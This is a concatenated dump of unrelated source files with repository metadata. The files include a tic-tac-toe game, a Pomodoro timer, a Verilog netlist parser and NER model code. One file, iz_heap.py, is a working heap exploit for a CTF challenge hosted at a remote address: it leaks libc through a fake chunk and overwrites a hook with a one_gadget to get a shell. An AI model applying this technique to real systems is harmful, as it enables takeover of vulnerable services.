f"\n\n__Kindly Leave A Message__ ! \n`He Will Reply To You Soon !`" \
if reason \
else f"**Hello, Boss Is AFK Right Now And May Be Forgot List Reason ! Any Way He Will Come Back Soon !**"
msg = await event.reply(message_to_reply)
await asyncio.sleep(5)
if event.chat_id in last_afk_message: # pylint:disable=E0602
await last_afk_message[event.chat_id].delete() # pylint:disable=E0602
last_afk_message[event.chat_id] = msg # pylint:disable=E0602
| [
"[email protected]"
] | |
19b16de0ef065f3a8c63d1aa8b0c09605b54ea69 | e44b2754d3cd9dbd7e419c44ca9f2a9efe00cb0b | /tictactoe.py | e93e54a52029b78dfc92ff4aa24629bfd543ef71 | [] | no_license | litannalex/JetBrains-Academy-Projects | 00126a4a9aef505fff79595c60fb9621e2dd74b9 | 896a38cfaee63bf5eaf7d7dcecef2fc1885f59b2 | refs/heads/master | 2022-11-11T09:19:04.019728 | 2020-06-27T00:09:19 | 2020-06-27T00:09:19 | 267,681,774 | 0 | 0 | null | 2020-06-29T17:45:19 | 2020-05-28T19:47:09 | Python | UTF-8 | Python | false | false | 2,863 | py | ROWS = 3
COLUMNS = 3
# takes 2 coordinates for a move,
# returns corresponding 1 coordinate in the list
def coordinate(c, r):
new_c = c - 1
new_r = ROWS - r
return new_r * COLUMNS + new_c
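# Example of the mapping (editor's illustration): with the 3x3 constants above,
# coordinate(1, 3) == 0 (top-left), coordinate(2, 2) == 4 (centre) and
# coordinate(3, 1) == 8 (bottom-right) in the flat 9-element field list.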
# takes list with symbols, prints out the battlefield
def print_field(l):
print("---------")
for i in range(ROWS):
print("|", " ".join(l[i * ROWS:i * ROWS + COLUMNS]), "|")
print("---------")
# creates the nested list with three-in-a-row combinations
def three_rows(l):
rows = [l[i:COLUMNS*i] for i in range(COLUMNS)]
columns = [l[0:7:3], l[1:8:3], l[2:9:3]]
diagonals = [l[0:9:4], l[2:7:2]]
three = [rows, columns, diagonals]
return three
# game set up: prints out empty fields, creates variable
field_list = list(' ' * 9)
print_field(field_list)
move_counter = 0
game_finished = False
while not game_finished:
# prompts the user to give coordinates for a move until valid
valid_input = False
valid_numbers = ['1', '2', '3']
move = -1
while not valid_input:
move_coordinates = input("Enter the coordinates: ").split()
if len(move_coordinates) != 2:
print("Enter exactly two numbers!")
elif not move_coordinates[0].isnumeric() or not move_coordinates[1].isnumeric():
print("You should enter numbers!")
elif move_coordinates[0] not in valid_numbers or move_coordinates[1] not in valid_numbers:
print("Coordinates should be from 1 to 3!")
else:
col, row = [int(i) for i in move_coordinates]
move = coordinate(col, row)
if field_list[move] not in [' ', '_']:
print("This cell is occupied! Choose another one!")
else:
valid_input = True
move_counter += 1
# writes user's move into the field list and outputs new field
if move_counter % 2 == 1:
field_list[move] = 'X'
else:
field_list[move] = 'O'
print_field(field_list)
# generates three-in-a-row combinations
three_in_a_row = three_rows(field_list)
# checks if input contains empty cells
empty_cells = False
for symbol in field_list:
if symbol in [' ', '_']:
empty_cells = True
# counts 3 in a row combinations for Xs and Os
winning = [['X'] * 3, ['O'] * 3]
x_three, o_three = 0, 0
for element in three_in_a_row:
for i in element:
if i == winning[0]:
x_three += 1
if i == winning[1]:
o_three += 1
# Prints game states
if x_three > 0 and o_three == 0:
print("X wins")
game_finished = True
elif o_three > 0 and x_three == 0:
print("O wins")
game_finished = True
elif (x_three == 0 and o_three ==0) and not empty_cells:
print("Draw")
game_finished = True
| [
"[email protected]"
] | |
289e97211637cfe7a0756c10320768fac5de8148 | f72a0878225776c4c51d6201aeda705c99e197a4 | /rna_transcription.py | bcfda4eba6b499420d1d3f1835135fcf076d0162 | [] | no_license | pnadolny13/exercism_python | f9dbb8ec0df809ef428a9c3141cc7a9539934698 | 26726fb8d1f732dae8b04e61bb6c99df00abbc2c | refs/heads/master | 2021-01-19T20:50:35.160506 | 2017-09-21T16:07:46 | 2017-09-21T16:07:46 | 88,566,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 20 22:42:11 2017
@author: pnadolny
"""
def to_rna(dna):
    dna = dna.upper()
    rna = []
    for nucleotide in dna:
        if nucleotide == "G":
            rna.append("C")
        elif nucleotide == "C":
            rna.append("G")
        elif nucleotide == "T":
            rna.append("A")
        elif nucleotide == "A":
            rna.append("U")
        else:
            rna = []
            break
    return ''.join(rna)
"[email protected]"
] | |
ed6dc456eab11ab5052cb302c87cfbb2ebce405a | e53009b7543a6dff5019dd8f21c9e7488d9daf72 | /2019/ISITDTU Quals/iz_heap.py | 3ec97d74aafa5b1c64c985d868e9f9bc378e27a5 | [] | no_license | hOwD4yS/CTF | ca8546cd0715ce4a3c2ebe5bf3939cc19932d38f | 0ff3de58513cbeb602a475f6add97b51c5574e28 | refs/heads/master | 2021-06-06T18:14:00.884142 | 2021-05-06T08:33:00 | 2021-05-06T08:33:00 | 144,465,413 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,144 | py | from pwn import *
#p = process("./iz_heap_lv1")
p = remote("165.22.110.249",3333)
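# Editor's note (inferred from the offsets below, unverified): this appears to
# be a glibc-2.27 heap exploit -- seven frees fill the 0x90 tcache bin, freeing
# a fake chunk placed in the name buffer leaves an unsorted-bin pointer
# (main_arena+96, offset 0x3ebca0) that is read back from the program output,
# and a second free of the resized fake chunk lets the fd be pointed at what is
# likely __free_hook (offset 0x3ed8e8), finally overwritten with a one_gadget
# at 0x4f322.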
def add(size , data):
p.sendlineafter(":","1")
p.sendlineafter(":",str(size))
p.sendafter(":",data)
def edit(idx , size , data):
p.sendlineafter(":","2")
p.sendlineafter(":",str(idx))
p.sendlineafter(":",str(size))
p.sendafter(":",data)
def delete(idx):
p.sendlineafter(":","3")
p.sendlineafter(":",str(idx))
def editname(name):
p.sendlineafter(":","4")
p.sendlineafter(":","Y")
p.sendafter(":",name)
p.sendafter(":",p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x91)+"A"*0x80+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
for i in range(7):
print i
add(0x7f,"A")
for i in range(7):
print i
delete(i)
delete(20)
editname("A"*0x20)
libcbase = u64(p.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x3ebca0
print hex(libcbase)
editname(p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x71)+"A"*0x60+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
delete(20)
editname(p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x71)+p64(libcbase+0x3ed8e8)+"A"*(0x60-8)+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
add(0x68,"A")
add(0x68,p64(libcbase+0x4f322))
p.interactive()
| [
"[email protected]"
] | |
5c4708a3dc80cafe963aa64187ed32d51dfc890f | 40f9febe33ab1b2aaf8e7b9a965dc4966476ab52 | /models/vision/detection/awsdet/utils/runner/hooks/logger/__init__.py | 2ace40536b0692bc9f7c12b192f427ae1b06c7ac | [
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | johnbensnyder/deep-learning-models | 770a9257eadb8f1b5bc250f277a45ac8c0eba2e7 | 5b1194a862c026a30d5dfff46979cb7e80869e81 | refs/heads/master | 2022-11-28T11:51:20.326742 | 2020-08-07T22:36:46 | 2020-08-07T22:36:46 | 262,207,411 | 0 | 1 | Apache-2.0 | 2020-05-08T02:26:16 | 2020-05-08T02:26:16 | null | UTF-8 | Python | false | false | 233 | py | # Copyright (c) Open-MMLab. All rights reserved.
from .base import LoggerHook
from .text import TextLoggerHook
from .tensorboard import TensorboardLoggerHook
__all__ = [
'LoggerHook', 'TextLoggerHook', 'TensorboardLoggerHook'
]
| [
"[email protected]"
] | |
a9db9d36ada768fb305ce1f861cf4a50ac70729a | fe8142632f381654a0b7073664c534dfbebb7851 | /ADJUSTABLE2.py | 282adb18887b73f074490de0080b3602609799f9 | [] | no_license | edgelore/Testing_development_over_time_for_creation_of_a_language | 2b4f248fbfed3c20207ff8ae11596073fd216066 | 1ad3ccbd37cc5831ecf1c7a55776592c4cae03f9 | refs/heads/master | 2020-04-13T22:28:07.528334 | 2018-12-29T06:02:11 | 2018-12-29T06:02:11 | 163,480,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | ADJUSTABLE2 = "CAPABILITY TO ADJUST"
| [
"[email protected]"
] | |
6ea5d6604909fba4dae2f6fa379bf3062b294799 | f78d8aae7c2e3c5c705b445d252822dffa5d2141 | /app/parse.py | 0399dbeed21272ffe777ee82458b17cb5c44a121 | [
"MIT"
] | permissive | o-alexandre-felipe/verilog-structural-manipulation | bc832ec2e061121ceb82b3441bd410806c785cc5 | d210b415cfa2ef732ba1099c8934b4b4354f2526 | refs/heads/master | 2021-09-08T03:57:14.697822 | 2021-09-03T08:22:07 | 2021-09-03T08:22:07 | 95,001,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,841 | py | import re;
module_re = re.compile('\\bmodule\\b.*?\\bendmodule\\b', re.MULTILINE | re.DOTALL);
module_parts_re = re.compile("""
\\bmodule\\b\s*
([a-zA-Z_][a-zA-Z0-9_]*) # module name
\s*(\#\s*\(.*?\))? # parameters are serparated by commas,
# the port list is separated with spaces
\s*\((.*?)\)\s*; # module port list
(.*?) # module body
\\bendmodule\\b
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
comments = re.compile('//.*?$|/\*.*?\*', re.MULTILINE | re.DOTALL | re.VERBOSE)
instance_re = re.compile("""
(\\b[a-zA-Z_][a-zA-Z0-9_]*\\b) # module name
\s*(\#\s*\(.*?\))? # parameter list this works only because of the ';' separating each instance
\s*?(\\b[a-zA-Z_][a-zA-Z0-9_]*\\b) # instance name
\s*?[(](.*?)[)]\s*; # port connections""", re.MULTILINE | re.DOTALL | re.VERBOSE)
""" Capture signal declarations
<s> name;
s [.:.] name;
"""
signal_re = lambda s, sep = ';': re.compile("""
((\\b%s\\b)\s*(\\[.*?:.*?\\])?\s*?(\\b[_a-zA-Z].*?\\b)\s*)%s
""" % (s, sep), re.MULTILINE | re.DOTALL | re.VERBOSE);
""" Capture different forms of parameter
parameter name = <>
parameter <type> name = <>
parameter <type> [range] name = <>
type is restricted to lowercase words. """
parameter_re = re.compile("""
parameter
\\b\s*?(?:[a-z]*?) # type
(?:\s*\[.*?\])?\s*? # range
(\\b[_A-Za-z].*?\\b)\s* # name
\\=\s*([^,;]*) # value
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
v95 = False;
input_re = signal_re('input\\b\\s*(?:\\bwire\\b)?', '[;,]');
output_re = signal_re('output\\b\\s*(?:\\bwire\\b)?','[;,]');
inout_re = signal_re('inout\\b\\s*(?:\\bwire\\b)?', '[;,]');
wire_re = signal_re('wire\\b');
named_connection_re = re.compile("\s*[.](\\b[a-zA-Z_][a-zA-Z0-9_]*\\b)\s*\\((.*?)\\)\s*",
re.MULTILINE | re.DOTALL | re.VERBOSE);
name_re = re.compile("\\b(?<!')([_a-zA-Z][a-zA-Z0-9_]*?|\\\\.*?\s)\\b");
class signal_declaration:
def __init__(self, src, _class, _range, _name):
self.src = src;
self._class = _class.strip();
self._range = _range.strip();
self.name = _name.strip();
def __str__(self):
if(self.src != None):
return self.src;
else:
return self._class + ' ' + self._range + ' ' + self.name;
def astype(self, _class):
return signal_declaration(None, _class, self._range, self.name);
def renamed(self, new_name):
return signal_declaration(None, self._class, self._range, new_name);
def translate_parameters(self, param_translation):
""" Given a dictionary with parameters update the range
if any parameter is found """
def trans(g):
token = g.group(1);
if(token in param_translation):
return param_translation[token];
else:
return token;
if(self.src == None):
self._range = name_re.sub(trans, self._range);
else:
self.src = name_re.sub(trans, self.src);
class module_declaration:
def __init__(self, s, src_file = None):
r = module_parts_re.match(s);
self.src = s;
self.src_file = src_file;
self.body_changed = False;
self.num_instances = 0;
if(r == None):
raise "Invalid string for a module definition";
else:
self.num_insts = 0;
self.name = r.group(1);
self.ports_string = r.group(3);
self.ports = [p.strip() for p in r.group(3).split(',')];
self.body_src = r.group(4);
self.find_inputs();
self.find_outputs();
self.find_wires();
self.find_inouts();
self.instances = {};
self.sub_blocks = {};
self.parameters = {};
for p in parameter_re.findall(self.body_src):
self.parameters[p[-2]] = p[-1].strip();
if(r.group(2) != None):
sp = r.group(2);
sp = sp[sp.index('('):len(sp) - sp[::-1].index(')') - 1];
for p in parameter_re.findall(sp):
self.parameters[p[-2]] = p[-1].strip();
def get_signal(self, name):
""" Return a signal by it's name regardless of its type. """
if(name in self.outputs):
return self.outputs[name];
if(name in self.inputs):
return self.inputs[name];
if(name in self.wires):
return self.wires[name];
if(name in self.inouts):
self.inouts[name];
def get_signal_direction(self, signal):
""" Determine the type of a signal,
based on the dictionary it is present. """
if(signal in self.outputs):
return 'output';
elif(signal in self.inputs):
return 'input';
elif(signal in self.wires):
return 'wire';
elif(signal in self.inouts):
return 'inout';
else:
return None;
def find_wires(self):
""" Using a regular expression find wires and store them
in a dictionary wires """
self.wires = {};
for w in wire_re.findall(self.body_src) + wire_re.findall(self.ports_string + ','):
self.wires[w[3]] = signal_declaration(*w);
def find_inputs(self):
""" Using a regular expression find inputs and store them
in a dictionary inputs """
self.inputs = {};
for w in input_re.findall(self.body_src) + input_re.findall(self.ports_string + ','):
self.inputs[w[3]] = signal_declaration(*w);
def find_outputs(self):
""" Using a regular expression find outputs and store them
in a dictionary outputs """
self.outputs = {};
for w in output_re.findall(self.body_src) + output_re.findall(self.ports_string + ','):
self.outputs[w[3]] = signal_declaration(*w);
def find_inouts(self):
""" Using a regular expression find inouts and store them
in a dictionary inouts """
self.inouts = {};
for w in inout_re.findall(self.body_src) + inout_re.findall(self.ports_string + ','):
self.inouts[w[3]] = signal_declaration(*w);
def __str__(self):
if(self.body_changed):
sm = "module " + self.name;
sm += self.parameter_declaration_v2001();
sm += '\n(\n' + self.port_list_string() + '\n);\n '
sm += self.parameter_declaration_v95();
sm += self.signal_declarations_string();
sm += ''.join(['\n ' + str(e).strip() + ';' for e in self.instances.values()])
sm += '\n\nendmodule\n\n'
return sm;
else:
return self.src + '\n';
def link(self, dict):
""" This routine find instances in the module body
and replace when possible with an object representing
that instance, based on the available modules, passed
via dict argument.
"""
insts = instance_re.findall(self.body_src);
for i in insts:
s = i[0] + ' ' + i[1] + ' ' + i[2] + '(' + i[3] + ')';
if(i[0] in dict):
b = instance_declaration(src = s, ref = dict[i[0]], parent = self, name = i[2]);
self.instances[i[2]] = b;
self.sub_blocks[i[2]] = b;
else:
b = instance_declaration(src = s, ref = None, parent = self, name = i[2]);
self.instances[i[2]] = b;
def move_to_chiplet(self, sub_blocks, chiplet_name, chiplet_instname = None):
c = chiplet_declaration(chiplet_name, self);
if(chiplet_instname == None):
chiplet_instname = chiplet_name;
for b in sub_blocks:
if(b in self.sub_blocks):
""" Without the variable tmp the RTL is corrupted
and it takes longer to execute """
tmp = self.sub_blocks[b];
c.include_instance(tmp)
del self.sub_blocks[b];
del self.instances[b];
else:
print "%s not found in %s" % (b, self.name);
self.sub_blocks[chiplet_name] = c.get_instanciation(parent = self, name = chiplet_instname);
self.instances[chiplet_name] = self.sub_blocks[chiplet_name];
self.body_changed = True;
return c;
def dissolve_sub_block(self, block_name, prefix = ''):
if(block_name in self.sub_blocks):
new_wires, new_insts = self.sub_blocks[block_name].get_dissolved_content(prefix = prefix);
for w in new_wires:
if(w in self.wires):
                    raise ValueError('The wire %s already exists, aborted dissolving.' % w);
for i in new_insts:
if(i in self.instances):
                    raise ValueError('The instance %s already exists, aborted dissolving.' % i);
""" Declares the required wires """
for w in new_wires:
self.wires[w] = new_wires[w];
""" Declare the instances from inside the subblock """
for i in new_insts:
ii = new_insts[i];
if(ii.ref != None):
self.sub_blocks[i] = ii;
self.instances[i] = ii;
""" Remove the sub block from the instances """
del self.sub_blocks[block_name];
del self.instances[block_name];
self.body_changed = True;
else:
            raise ValueError('sub_block not found, nothing to be dissolved.')
def hierarchy_tree(self, instname, f = lambda entity, inst_name: [inst_name]):
""" Create an hierarchical list containing some property
of each instance, returnded by a function f."""
r = [f(self, instname), []];
for sb in self.sub_blocks:
r[1].append(self.sub_blocks[sb].ref.hierarchy_tree(sb, f))
return r;
def parameter_declaration_v2001(self):
if(v95):
return '';
else:
if(len(self.parameters) == 0):
return '';
else:
plist = ['parameter %s = %s' % (k,v) for k,v in
zip(self.parameters.keys(), self.parameters.values())];
return "#(\n " + (',\n '.join(plist)) + ')';
def parameter_declaration_v95(self):
if(v95):
            plist = ['\n parameter %s = %s;' % (k, v) for k, v in
                zip(self.parameters.keys(), self.parameters.values())];
            return ''.join(plist);
else:
return '';
def signal_declarations_string(self):
""" Verilog 1995 defines the types of the ports in the module body
after verilog 2001 only the wires are declared in the module
and the ports are fully declared in the port list. """
sm = '';
if(v95):
sm = '\n// Input declarations\n'
sm += '\n'.join([str(w) + ';' for w in self.inputs.values()])
sm += '\n// Output declarations\n'
sm += '\n'.join([str(w) + ';' for w in self.outputs.values()])
sm += '\n// INOUT declarations\n'
sm += '\n'.join([str(w) + ';' for w in self.inouts.values()])
sm += '\n// Wire declarations\n';
sm += '\n'.join([str(w) + ';' for w in self.wires.values()])
return sm + '\n\n';
def port_list_string(self):
""" The module portlist declares ports that will be present in
the module, after verilog 2001 it also defines the type of the port """
sm = '';
if(v95):
sm += ' ' + (',\n '.join(self.inputs.keys() + self.outputs.keys() + self.inouts.keys()));
else:
sm += ',\n'.join([str(w) for w in self.inputs.values()] +
[str(w) for w in self.outputs.values()] +
[str(w) for w in self.inouts.values()]);
return sm;
def stub(self):
""" Write the same HDL struct without the instances
whose corresponding modules were not declared """
sm = "module " + self.name + '\n(\n' + ',\n '.join(self.ports) + '\n);\n '
for p in self.parameters:
sm += '\n parameter %s = %s;' % (p, self.parameters[p]);
sm += self.signal_declarations_string();
sl = [];
for e in self.sub_blocks.values():
sl.append(str(e) + ';');
sm += '\n '.join(sl);
sm += '\nendmodule\n'
return sm;
class instance_declaration:
def __init__(self, src, ref = None, parent = None,
name = None, params = None, connections = None):
if((name == None) or (params == None) or (connections == None) or (ref == None)):
g = instance_re.match(src + ';');
if(g != None):
self.params = g.group(2);
self.name = g.group(3);
self.connections = g.group(4);
self.ref_name = g.group(1);
else:
self.src = src;
self.name = name;
self.params = params;
self.connections = connections;
self.src = src;
if(ref != None):
self.ref = ref;
ref.num_instances += 1;
self.ref_name = self.ref.name;
else:
self.ref = None;
self.parent = parent;
def __str__(self):
return self.src;
def stub(self):
if(self.ref != None):
return self.src;
def get_port_connections_strings(self):
""" Retrieve the text that defines each connection """
if(self.connections == None):
return [];
pl = [s for s in named_connection_re.findall(self.connections)];
return pl;
def get_parameter_connections_strings(self):
if(self.params == None):
return [];
pl = [s for s in named_connection_re.findall(self.params)];
return pl;
def get_connections(self):
"""
return a list of the signals connected to this instance
with the directions of the port to which it is connected
- inout is dominant over input and ouput.
- output is dominant over input.
This provide the directions to the ports in a module
that whould encapsulate this instance as is.
"""
outputs = {};
inputs = {};
inouts = {};
pl = self.get_port_connections_strings();
""" Create a list of ports from signals connected to the ports """
for i in range(0, len(pl)):
""" No support for ordered connections yet """
names = [s.strip() for s in name_re.findall(pl[i][1])];
""" Process an named connection """
direction = self.ref.get_signal_direction(pl[i][0].strip());
""" Add the signal to the correct bin """
if(direction == 'output'):
for n in names:
s = self.parent.get_signal(n);
if(s != None):
outputs[n] = s.astype('output');
elif(direction == 'input'):
for n in names:
s = self.parent.get_signal(n);
if(s != None):
inputs[n] = s.astype('input');
elif(direction == 'inout'):
for n in names:
s = self.parent.get_signal(n);
if(s != None):
inouts[n] = s.astype('inout');
""" Remove inputs and outputs that also appears as inout. """
for p in inputs:
if ((p in outputs) or (p in inouts)):
del inputs[p];
""" Remove inputs that also appear as output. """
for p in outputs:
if (p in inouts):
del outputs[p];
return inputs, outputs, inouts;
def reconnect(self, signal_translation = {}, parameter_translation = {}, parent = None, prefix = ''):
def translate_signals(m):
token = m.group(1);
if(token in signal_translation):
return signal_translation[token];
elif(token in parameter_translation):
return parameter_translation[token];
else:
return prefix + token;
def translate_named_connection(m):
s = '\n .' + m.group(1) + '(';
s += name_re.sub(translate_signals, m.group(2)) + ')'
return s;
s = self.ref_name;
if(self.params != None):
s += named_connection_re.sub(translate_named_connection, self.params);
s +=' ' + prefix + self.name + '('; # instance name (now with prefix)
if(self.connections != None):
s += named_connection_re.sub(translate_named_connection, self.connections);
s += ')'
# Keep the same module as the parent of this instance.
newinst = instance_declaration(src = s, ref = self.ref,
parent = parent, name = prefix + self.name);
return newinst;
def get_resolved_parameters(self):
param_translations = {};
for p in self.ref.parameters:
param_translations[p] = '%s' % self.ref.parameters[p];
if(self.params != None):
pl = named_connection_re.findall(self.params);
for p,r in pl:
param_translations[p] = '%s' % r;
return param_translations;
def get_dissolved_content(self, prefix):
if(self.ref == None):
return None;
my_params = self.get_resolved_parameters();
""" Return a list of connected ports """
p = self.get_port_connections_strings();
my_ports = {};
for u in p:
my_ports[u[0]] = "%s" % u[1];
new_wires = {};
for w in self.ref.wires:
if(not w in my_ports):
wi = self.ref.wires[w].renamed(prefix + w);
wi.translate_parameters(my_params);
new_wires[prefix + w] = wi;
new_insts = {};
for sb in self.ref.instances:
working_inst = self.ref.instances[sb].reconnect(
parent = self.parent,
signal_translation = my_ports,
parameter_translation = my_params,
prefix = prefix
);
new_insts[prefix + '_' + sb] = working_inst;
sw = str(working_inst);
return new_wires, new_insts;
class chiplet_declaration(module_declaration):
def __init__(self, name, parent):
self.ports = [];
self.name = name;
self.parent = parent;
self.inputs = {};
self.outputs = {}
self.inouts = {};
self.wires = {};
self.sub_blocks = {};
self.instances = {};
self.parameters = {};
self.body_changed = True;
self.num_instances = 0;
def include_instance(self, inst):
"""
Insert an instance int the current chiplet,
update it's interface, and resolve conflicts
regarding port directions.
"""
i, o, io = inst.get_connections();
params = inst.get_parameter_connections_strings();
""" process instance connections """
for u in i:
self.inputs[u] = i[u];
for u in o:
self.outputs[u] = o[u];
for u in io:
self.inouts[u] = io[u];
for u in params:
for v in name_re.findall(u[1]):
self.parameters[v] = '0'; # this must be overloaded
""" Resolve conflicting port directions """
for u in self.inputs.keys():
if((u in self.outputs) or (u in self.inouts)):
del self.inputs[u];
for u in self.outputs.keys():
if(u in self.inouts):
del self.outputs[u];
# If some symbol used in port connections is a parameter
# pass it as a parameter, not as an input or output.
for plist in (i, o, io):
for p in plist:
if(p in self.parent.parameters):
del plist[p];
self.parameters[p] = 0;
else:
# Parameters used to declare signals used in the instances.
for par in name_re.findall(plist[p]._range):
self.parameters[par] = 0;
""" Update port list """
self.ports = self.inputs.keys() + self.outputs.keys() + self.inouts.keys();
""" Place instance inside the chiplet """
self.sub_blocks[inst.name] = inst;
self.instances[inst.name] = inst;
def get_instanciation(self, parent, name):
s = self.name + ' '
if(len(self.parameters) != 0):
s += "#(" + (',\n '.join(['.%s(%s)' % (p,p) for p in self.parameters])) + '\n)';
s += name + '(\n ';
s += ',\n '.join(['.%s(%s)' % (p, p) for p in self.ports]);
s += '\n)';
si = instance_declaration(src = s, ref = self, parent = parent, name = name)
return si;
class structural_parser:
def __init__(self, fname = None, no_link = False):
self.modules_by_name = {};
self.modules_by_file = {};
self.unresolved = set();
self.modules = [];
if(fname == None):
return; # supported for python2.7
# self.modules_by_name = {m.name: m for m in self.modules};
self.parse_file(fname);
if(not no_link):
self.link();
def parse_file(self, fname):
fh = open(fname);
fs = comments.sub("", fh.read());
fh.close();
tmodules = [module_declaration(s, fname) for s in module_re.findall(fs)];
self.modules_by_file[fname] = tmodules;
for m in tmodules:
self.modules_by_name[m.name] = m;
""" If the HDL was linked with unresolved
modules, then a file defining a module that was unresolved
is loaded, remove it from the list of unresolved.
however its references will be resolved only after
calling the link method. """
self.unresolved.discard(m.name)
self.modules += tmodules;
def save_hdl_file(self, fname):
if(fname in self.modules_by_file):
fh = open(fname, "w");
for m in self.modules_by_file[fname]:
fh.write(str(m));
m.body_changed = False;
fh.close();
def write_stub(self, fname):
fh = open(fname, "w");
for m in self.modules:
fh.write(m.stub());
fh.close();
def write_hdl(self, fname):
fh = open(fname, "w");
for m in self.modules:
fh.write(str(m));
fh.close();
def link(self):
""" when the modules were parsed, the list of available
modules was not available, now we are able to parse
instances and associate each instance with the corresponding
module declaration """
for m in self.modules:
m.link(self.modules_by_name);
for u in m.instances:
if(not u in m.sub_blocks):
""" Keep a set of unresolved modules """
self.unresolved.add(u);
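
# Editor's sketch of typical usage (hypothetical file names, not part of the
# original module):
#   parser = structural_parser('top.v')            # parse and link
#   top = parser.modules_by_name['top']
#   chiplet = top.move_to_chiplet(['u_a', 'u_b'], 'ab_chiplet')
#   parser.modules.append(chiplet)                 # so write_hdl emits it too
#   parser.write_hdl('top_restructured.v')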
| [
"[email protected]"
] | |
9b9d7095b47314c16a5bb2eb07d9b53a29be7d85 | e7d464c201a195cb8cbe277d9bb329955f9c6c8a | /main.py | 00e776fab18a8ed59bc5268af85e6720f651b79f | [] | no_license | OmarSadigli/Pomodoro-Timer- | 2548f3c82b96205fa70567ace32a6534c64a399d | f613a8fd5a17e07504b0040399c60b333f9634c6 | refs/heads/main | 2023-03-06T03:08:49.210071 | 2021-02-15T10:05:53 | 2021-02-15T10:05:53 | 339,034,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,629 | py | from tkinter import *
import math
# ---------------------------- CONSTANTS ------------------------------- #
PINK = "#e2979c"
RED = "#e7305b"
GREEN = "#9bdeac"
YELLOW = "#f7f5dd"
FONT_NAME = "Courier"
WORK_MIN = 25
SHORT_BREAK_MIN = 5
LONG_BREAK_MIN = 20
reps = 0
timer = None
# ---------------------------- TIMER RESET ------------------------------- #
def reset_timer():
global reps
window.after_cancel(timer)
canvas.itemconfig(timer_text, text="00:00")
timer_label.config(text="Timer", fg=GREEN)
check_marks.config(text="", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 25))
reps = 0
# ---------------------------- TIMER MECHANISM ------------------------------- #
def start_timer():
global reps
work_sec = WORK_MIN * 60
short_break_sec = SHORT_BREAK_MIN * 60
long_break_sec = LONG_BREAK_MIN * 60
reps += 1
if reps % 8 == 0:
timer_label.config(text="Break", fg=RED)
count_down(long_break_sec)
elif reps % 2 == 0:
timer_label.config(text="Break", fg=PINK)
count_down(short_break_sec)
else:
timer_label.config(text="Work")
count_down(work_sec)
# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #
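# Editor's note: count_down() re-arms itself once per second with
# window.after(1000, ...); when the count reaches zero it calls start_timer(),
# which alternates work and short-break sessions, inserts a long break every
# eighth rep, and adds one check mark per completed work session.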
def count_down(count):
count_min = math.floor(count / 60)
count_sec = count % 60
if count_sec < 10:
count_sec = f"0{count_sec}"
canvas.itemconfig(timer_text, text=f"{count_min}:{count_sec}")
if count > 0:
global timer
timer = window.after(1000, count_down, count - 1)
else:
start_timer()
marks = ""
for _ in range(math.floor(reps / 2)):
marks += "✔"
check_marks.config(text=marks)
# ---------------------------- UI SETUP ------------------------------- #
window = Tk()
window.title("Pomodoro")
window.config(padx=100, pady=50, bg=YELLOW)
canvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)
tomato_img = PhotoImage(file="tomato.png")
canvas.create_image(100, 112, image=tomato_img)
timer_text = canvas.create_text(100, 130, text="00:00", fill="white", font=(FONT_NAME, 35, "bold"))
canvas.grid(column=1, row=1)
timer_label = Label(text="Timer", font=(FONT_NAME, 40, "bold"), fg=GREEN, bg=YELLOW)
timer_label.grid(column=1, row=0)
start_button = Button(text="Start", highlightthickness=0, command=start_timer)
start_button.grid(column=0, row=2)
reset_button = Button(text="Reset", highlightthickness=0, command=reset_timer)
reset_button.grid(column=2, row=2)
check_marks = Label(fg=GREEN, bg=YELLOW, font=(FONT_NAME, 25))
check_marks.grid(column=1, row=3)
window.mainloop()
| [
"[email protected]"
] | |
be9cf6de41337a706ff9fa46d7816b99d1f552a0 | b306aab9dcea2dd83dda700bc9f7b9f1a32cff3a | /CAIL2021/slsb/main.py | f67c06674df00f1d0948662b5528d9c5174dd6c3 | [
"Apache-2.0"
] | permissive | Tulpen/CAIL | d6ca9981c7ea2603ae61675ba330a9614cd9398d | c4cfa98ab4ecedbce34a7a5a186830486047540c | refs/heads/master | 2023-04-23T20:07:56.774530 | 2021-04-16T13:18:36 | 2021-04-16T13:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,066 | py | """Test model for SMP-CAIL2020-Argmine.
Author: Tsinghuaboy [email protected]
Usage:
python main.py --model_config 'config/bert_config.json' \
--in_file 'data/SMP-CAIL2020-test1.csv' \
--out_file 'bert-submission-test-1.csv'
python main.py --model_config 'config/rnn_config.json' \
--in_file 'data/SMP-CAIL2020-test1.csv' \
--out_file 'rnn-submission-test-1.csv'
"""
import argparse
import itertools
import json
import os
import re
from types import SimpleNamespace
import fire
import pandas as pd
import torch
from torch.utils.data import DataLoader
from data import Data
from evaluate import evaluate, handy_tool, calculate_accuracy_f1
from model import RnnForSentencePairClassification, BertYForClassification, NERNet,NERWNet
from utils import load_torch_model
LABELS = ['1', '2', '3', '4', '5']
MODEL_MAP = {
'bert': BertYForClassification,
'rnn': NERNet,
'rnnkv': NERWNet
}
all_types = ['LAK', 'OTH', 'HYD', 'ORG', 'LOC', 'RIV', 'RES', 'TER', 'DAM', 'PER']
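# Editor's note (inferred from result_to_json below, not documented by the
# original authors): tag 0 marks a single character ('s'); for entity type
# all_types[i], tag 3*i+1 opens an entity, 3*i+2 continues it and 3*i+3 closes
# it, hence type_index = (tag - 1) // 3 in the function below.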
def result_to_json(string, tags):
item = {"string": string, "entities": []}
entity_name = ""
entity_start = 0
idx = 0
i = -1
zipped = zip(string, tags)
listzip = list(zipped)
    last = len(listzip) - 1
for char, tag in listzip:
